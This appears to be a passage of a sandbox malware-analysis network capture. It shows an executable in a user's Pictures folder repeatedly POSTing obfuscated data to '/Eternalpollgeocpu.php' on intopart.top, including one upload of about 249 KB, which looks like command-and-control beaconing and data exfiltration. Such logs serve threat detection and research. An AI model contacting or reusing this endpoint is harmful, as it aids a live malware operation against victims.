Apr 29, 2024 01:02:58.814660072 CEST	1080	OUT	Data Raw: 58 59 5a 51 50 59 5e 51 54 56 50 51 5a 51 51 52 5b 59 5e 44 54 5c 50 45 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XYZQPY^QTVPQZQQR[Y^DT\PE]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$1><^#1$&9_;#$=_(*2+('#-<)#U6[3 Z/!Z/
Apr 29, 2024 01:02:59.214601994 CEST	591	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:02:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NFU3IyTQCzqjfY2CilwuZX0W6Mz%2Fgu0qNMP%2F82YLQ3tcYXWzMZ%2BhjHXSCRRUO06geuUQUfZwwxZUVRHoVltHeiP%2Fbob6Pgg3UGKZ8OpBjvvqWgLZ%2Brn%2FX%2B%2By5SfhDHA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaed94f046203-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:02:59.214623928 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49763	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:01.073499918 CEST	257	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue Connection: Keep-Alive
Apr 29, 2024 01:03:01.184482098 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:01.184652090 CEST	1080	OUT	Data Raw: 58 52 5a 5c 50 5e 5b 54 54 56 50 51 5a 55 51 5b 5b 5a 5e 49 54 5a 50 42 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XRZ\P^[TTVPQZUQ[[Z^ITZPB]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$&[8 ?2=*-%''8^):!?#V$0/;<"#$ Z/!Z/(
Apr 29, 2024 01:03:01.584583998 CEST	595	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KPW7RIJ4D%2BCr64V%2FjcPnysDbOZr2MvAOrK%2F%2B59cFxw%2FZPQswvP5G4mc%2Fs3FlVrC3az2VByrk5VhF2ho8FpPy%2FSzgIeneWWk%2FiGj8wuoD%2FvrXdG%2BK6ZzwSKUhwNEbHw4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaee81e282aae-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:01.584614038 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49764	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:01.914489985 CEST	257	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue Connection: Keep-Alive
Apr 29, 2024 01:03:02.025187969 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:02.025361061 CEST	1080	OUT	Data Raw: 5d 5f 5a 50 55 59 5e 55 54 56 50 51 5a 53 51 51 5b 5f 5e 47 54 5a 50 46 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]_ZPUY^UTVPQZSQQ[_^GTZPF]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'&><]4"8&>)[;& '="V<><$8,,43.^$ Z/!Z/0
Apr 29, 2024 01:03:02.323308945 CEST	585	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ltSczOCeTUhmSvCo9JpQi9Xn2esB8rAfoD9luSOp15qiQxOcIcPF4C5z4bwgKm%2B9gN%2B0EK8xEtn7orHWcgK7cOMWyUoWSg29fMFv%2ByFaFyk47Vu%2FYunkxy6aY%2Bt3lIs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaeed5b252246-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:02.323334932 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49765	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:02.364742041 CEST	257	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1772 Expect: 100-continue Connection: Keep-Alive
Apr 29, 2024 01:03:02.474839926 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:02.475008965 CEST	1772	OUT	Data Raw: 58 5d 5a 5a 55 59 5b 50 54 56 50 51 5a 56 51 5b 5b 58 5e 44 54 53 50 47 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X]ZZUY[PTVPQZVQ[[X^DTSPG]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$%-#1$Y%X%^;%3$-)*W<=+3#;<:7#>' Z/!Z/
Apr 29, 2024 01:03:02.885508060 CEST	732	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DMpwhbTg%2FJo2v3gSFOcoa4Rg0IatUcvQciv5TBx5AnX5YjunNI8E2EZNFFE%2BdjFreDpYYN0DRbM5GjGMVrG9bCzZfRPlXCx7OzvaC1NLsXMfy%2BhXZuYZdmVQ%2BPrj1J4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaef02cad86f8-ORD alt-svc: h2=":443"; ma=60 Data Raw: 39 38 0d 0a 0e 12 20 5a 29 2b 2e 0b 2a 22 32 19 27 22 20 0e 27 3c 3c 41 3d 06 2e 08 26 0d 20 5d 2f 00 2d 09 27 1d 38 16 23 3a 38 58 25 21 33 50 28 24 20 59 02 1c 39 44 26 2a 22 59 32 07 37 5d 3c 22 3d 16 22 00 2f 03 2a 06 22 56 24 06 21 5f 3f 33 2a 5a 3c 07 20 50 2c 3e 31 17 32 27 23 1f 28 0f 2c 52 08 13 23 0d 2b 30 38 1d 20 2b 37 52 30 0c 26 14 27 26 37 50 21 38 06 57 28 39 0a 5c 33 0c 0c 10 25 0c 21 08 3a 55 3f 41 37 3f 35 5c 27 17 21 5c 2f 02 20 49 0f 34 5d 53 0d 0a Data Ascii: 98 Z)+."2'" '<<A=.& ]/-'8#:8X%!3P($ Y9D&"Y27]<"="/"V$!_?3Z< P,>12'#(,R#+08 +7R0&'&7P!8W(9\3%!:U?A7?5\'!\/ I4]S
Apr 29, 2024 01:03:02.885535955 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49766	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:02.513948917 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:02.623963118 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:02.624131918 CEST	1080	OUT	Data Raw: 5d 5f 5a 58 55 59 5b 55 54 56 50 51 5a 5f 51 53 5b 5d 5e 47 54 5c 50 49 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]_ZXUY[UTVPQZ_QS[]^GT\PI]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'[%,[ ",_&>_-5''[$Z(91+>3'',9#0=0: Z/!Z/
Apr 29, 2024 01:03:03.014203072 CEST	585	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DZ4cNAMZGLatMr7NEibu5b51ekQqWReW3%2BPyvnMH5BTqHIHACqaR7sL%2FkniN8YUbHNAfizEzMZ1qEy82y5F8FFVfM%2BXhknBX%2BLLan7fsK5Bi0UfhFDQz9GvXRj%2FVwWg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaef11f572c7c-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:03.014230013 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49767	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:03.290281057 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:03.400918961 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:03.404149055 CEST	1080	OUT	Data Raw: 58 52 5f 58 50 5e 5b 52 54 56 50 51 5a 52 51 50 5b 5e 5e 42 54 58 50 48 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XR_XP^[RTVPQZRQP[^^BTXPH]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'\%= 2:/'>?=<.7P0U8;"4$ Z/!Z/4
Apr 29, 2024 01:03:03.801043034 CEST	587	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ed5ol3tI9g0UGa1AeoB11eEIU5GrsD7Y0%2B4NproTVVoBKouTcsLxrAccuqhap%2BP%2B0F%2FValFttSBx%2F12oiO%2BJCPRWEaDx03W32XD0rYGyYKPrbpZOvXhtPI18P2xkYsE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaef5e948e1f3-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:03.801089048 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49768	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:06.616455078 CEST	259	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 249068 Expect: 100-continue Connection: Keep-Alive
Apr 29, 2024 01:03:06.726558924 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:06.726807117 CEST	12890	OUT	Data Raw: 58 5e 5a 5b 55 57 5e 51 54 56 50 51 5a 51 51 50 5b 5e 5e 46 54 5c 50 49 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X^Z[UW^QTVPQZQQP[^^FT\PI]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_']2-'72 X&.,5 U'$^(:<-$$?//Y43=' Z/!Z/
Apr 29, 2024 01:03:06.836689949 CEST	5156	OUT	Data Raw: 38 32 25 33 2b 1e 3b 5a 1a 54 3f 33 2b 0d 3b 24 1a 23 30 0d 3d 5e 39 41 1a 2f 0e 5d 33 16 31 5f 23 27 3f 31 39 58 0c 33 13 36 39 30 1a 1c 20 3f 04 3a 0f 3a 21 5f 02 3f 0e 35 33 2b 37 22 3d 05 34 3c 3b 28 21 22 08 3d 20 03 00 2f 3a 1e 32 58 24 1f Data Ascii: 82%3+;ZT?3+;$#0=^9A/]31_#'?19X3690 ?::!_?53+7"=4<;(!"= /:2X$6>788$-$V;] ?<X940'X"4\!2>5ZV?/>&?T=7>>;<9'?4-$34&;/48?(=+)S8U,,YX!>?9 '7-+(;4 5;[0/3";218R&X/\(.&/"#_)8%&:.Y+
Apr 29, 2024 01:03:06.836721897 CEST	5156	OUT	Data Raw: 3d 01 0b 3e 3d 16 34 3f 0e 01 22 5b 26 59 0f 05 50 5a 05 06 06 1f 30 02 38 19 38 00 27 1a 3f 01 52 29 0f 0f 30 07 06 5a 39 35 00 05 09 3d 34 5a 2a 0d 0e 3d 20 20 30 00 0d 2c 38 29 34 1f 3a 5a 3b 03 38 55 3b 1d 0e 2d 18 3c 35 39 3f 51 38 02 19 00 Data Ascii: =>=4?"[&YPZ088'?R)0Z95=4Z= 0,8)4:Z;8U;-<59?Q8=<Y $W/&??%Z;8.1/<9#D)X2Z,V;&&13-+=!+X2!$@'%>;_#(00!9T6[Z)#_Y'0(10>>/=++.="-S[0<0?';ZP7?5$8%%
Apr 29, 2024 01:03:06.836827040 CEST	7734	OUT	Data Raw: 3c 06 3e 31 1b 36 35 3d 3f 03 06 2e 03 57 0c 07 38 2e 0f 22 3f 29 38 01 38 1c 0d 2d 27 2d 38 23 23 1c 25 2c 00 1e 03 37 0e 57 0b 2d 33 19 36 38 21 13 29 3d 28 2d 33 0b 24 1e 03 33 39 5b 0e 0d 07 5f 0d 5b 11 22 29 5f 0e 59 26 27 33 3c 3f 32 1d 3a Data Ascii: <>165=?.W8."?)88-'-8##%,7W-368!)=(-3$39[_[")_Y&'3<?2:.829'=,F&X#)8-6=.8SZ!31?'725$:B78;9<4?#'?2C:;1<,\3 >:"7(^Q83:[39<%;<:%P!\5#Y#2T'6*3)_48+/(?>YW0[9#/<_3<^D:
Apr 29, 2024 01:03:06.836903095 CEST	5156	OUT	Data Raw: 25 55 5e 56 30 07 22 2c 22 31 00 16 3a 3e 23 3e 02 39 3f 14 0c 38 27 20 30 30 37 20 3a 0a 3c 3a 2b 41 15 59 34 2d 2b 09 3d 5b 33 11 28 2b 2e 24 32 22 35 55 3d 3e 24 24 3b 5a 2f 1e 30 00 31 1a 0e 22 37 5c 30 5a 56 35 3b 37 50 37 37 2b 33 3d 3e 09 Data Ascii: %U^V0","1:>#>9?8' 007 :<:+AY4-+=[3(+.$2"5U=>$$;Z/01"7\0ZV5;7P77+3=>$#1 "=Y:[;%Y"/;_6Q8?&->?0Z[;$7V'0??;-0P\GT2)4?4?U?81636WZ ]<-P/$70(3(^550#6R0/-6?2?[?P\ 2[#9 _2&/(
Apr 29, 2024 01:03:06.877958059 CEST	2578	OUT	Data Raw: 29 33 20 26 24 2e 2c 5b 28 38 2d 10 06 30 29 08 3a 54 1a 26 3a 00 1e 0b 04 2c 13 02 08 57 24 1c 33 5a 57 56 3b 35 5c 29 3b 3a 58 2f 26 22 5f 36 28 57 01 27 36 31 21 45 3e 38 31 38 20 13 5b 1f 33 30 08 16 09 2d 2b 5f 29 39 21 2f 38 58 03 5c 3f 57 Data Ascii: )3 &$.,[(8-0):T&:,W$3ZWV;5\);:X/&"_6(W'61!E>818 [30-+_)9!/8X\?W%93/-6=P(,(#Q7$?3@<9? =8+=\33)7$U%">,:8=[^:5Y0'_"-1?^!$&1>=3!01]7=X368_ =!9&2"3@(#66-3[ 203"["2!3\0$BX
Apr 29, 2024 01:03:06.946686983 CEST	18046	OUT	Data Raw: 5b 2e 3c 06 1d 25 33 06 2a 43 3c 0c 2b 39 06 04 03 26 3e 33 51 19 3a 3e 15 5b 3e 32 0a 14 3c 30 33 1a 2a 55 17 45 08 3a 07 3c 24 2d 0e 04 31 20 22 02 08 00 0e 11 2b 3a 17 3b 26 3c 54 5c 10 57 31 3e 32 3b 28 51 32 3c 31 1d 09 0f 38 22 3f 54 2b 30 Data Ascii: [.<%3C<+9&>3Q:>[>2<03UE:<$-1 "+:;&<T\W1>2;(Q2<18"?T+0;<;SWW;<18#73!+1+;4"51=T4/E?>"<.?4>[;;;+&=,8>1'<Y21.1/0?T4=Y8/?;;4*,0?Q=X\+/+3X+S,Y'4>$1_W!2A3 W$D2@3
Apr 29, 2024 01:03:06.946712971 CEST	5156	OUT	Data Raw: 33 36 0f 18 33 33 06 46 0d 3f 19 1a 0d 3e 09 11 09 3a 29 3d 24 3d 38 33 3e 2c 13 34 3e 3c 37 2a 04 59 32 29 0f 3d 3c 1e 27 01 0d 33 0c 06 1e 10 0b 00 50 5a 0d 0b 2f 29 31 3d 1c 39 33 1a 2f 12 08 5b 11 3c 02 29 1f 23 34 5b 0e 28 3b 0a 12 35 35 2c Data Ascii: 3633F?>:)=$=83>,4><7*Y2)=<'3PZ/)1=93/[<)#4[(;55,&>"^>34( 4%7Y+W\.72572<'-]:4 .Y Z21?7,SB\Z]X"1W37W3"!%'[8+T"Z#;)>36>#!X(+)[=$PU37?"3#45+43!:?7$"^]3\ 86
Apr 29, 2024 01:03:06.946743965 CEST	7734	OUT	Data Raw: 23 5a 38 5b 25 3c 2b 0f 38 00 5a 58 0a 02 0d 2a 3a 08 0d 26 0e 3d 14 5e 35 1a 2f 08 3c 58 2f 13 35 3b 0f 37 28 59 2f 57 24 23 28 20 03 33 2a 02 23 2f 21 22 0d 04 3f 1b 04 38 28 02 3b 37 23 2b 3f 55 37 21 39 2e 38 22 3d 34 27 3e 2a 33 16 38 32 3e Data Ascii: #Z8[%<+8ZX:&=^5/<X/5;7(Y/W$#( 3#/!"?8(;7#+?U7!9.8"=4'>382>]X7/5U;=!W;?"6X)"7(?6;7%-#V+1&15%$"$ 31;>XX7)R=Y&'%:?0,\18&" [#=076"$S<A,36?S3;#:= 02&W-2D"Z]\=Q\+=#@0_#)<<RW
Apr 29, 2024 01:03:06.946768045 CEST	5156	OUT	Data Raw: 3b 58 29 02 12 58 3d 1e 3f 06 28 22 3f 25 36 32 30 32 2c 43 40 2c 32 00 20 00 3d 07 3c 13 3c 5e 03 56 29 20 25 2f 0d 32 28 30 25 3e 58 21 2a 3f 0f 27 25 57 37 05 07 3f 13 2c 3f 1e 2f 06 20 5c 27 1f 3d 3d 20 57 32 20 3f 5d 32 57 2a 3e 3f 35 3d 3f Data Ascii: ;X)X=?("?%6202,C@,2 =<<^V) %/2(0%>X!?'%W7?,?/ \'== W2 ?]2W>?5=?%_T:>=]0$-$Z#%&[187?6'0%T\0:?U+T;'=;=;34>$58?9 ^<U.\;2-+5/84+U 8>=7X3A:^\<<-:413'283>>3.P])?27 Z9//$^+9+9!>=[36_-)1V
Apr 29, 2024 01:03:08.122554064 CEST	585	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s1hjndTzcrLIngjeWwaWpD%2BArWxcRbW5QRjUexxkULI%2BLgbJZMHkS1WN1YHVg0B5WyuTFVI07GoZ%2BK%2B%2BHhZgl30hV3Y2s7PhYraIOpdkAmNy8lUAxARIaf26A0c6gDQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaf0abe6c6287-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49769	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:06.638767004 CEST	257	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Apr 29, 2024 01:03:06.749252081 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:06.749391079 CEST	1072	OUT	Data Raw: 58 53 5f 5c 50 59 5b 52 54 56 50 51 5a 56 51 53 5b 59 5e 41 54 59 50 47 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XS_\PY[RTVPQZVQS[Y^ATYPG]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'Y&+ 1?&X)/50=>-(-4&0#S8/)Z#3*[3 Z/!Z/,
Apr 29, 2024 01:03:07.148643017 CEST	585	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=itbXm%2B9Lb9Xc2ApK7vIePXhm6Lwx2vlW%2FjYzOy2E0%2Bx1yXtxNLBzsk3NtNSNtW3VZRyjPayPRXojXyVM9zy%2BWCLGcy4bkd2ZRW5UIEiZ3MV6heORjk8p%2B4LeV0YJixo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaf0adba09120-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:07.148683071 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49772	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:07.312264919 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:07.423242092 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:07.423441887 CEST	1080	OUT	Data Raw: 5d 5a 5a 58 55 57 5b 5e 54 56 50 51 5a 5f 51 55 5b 5a 5e 41 54 5f 50 48 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]ZZXUW[^TVPQZ_QU[Z^AT_PH]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'[%[,]7$&X%_,%0Z*\1+0,,Y=Y4]0 Z/!Z/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49774	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

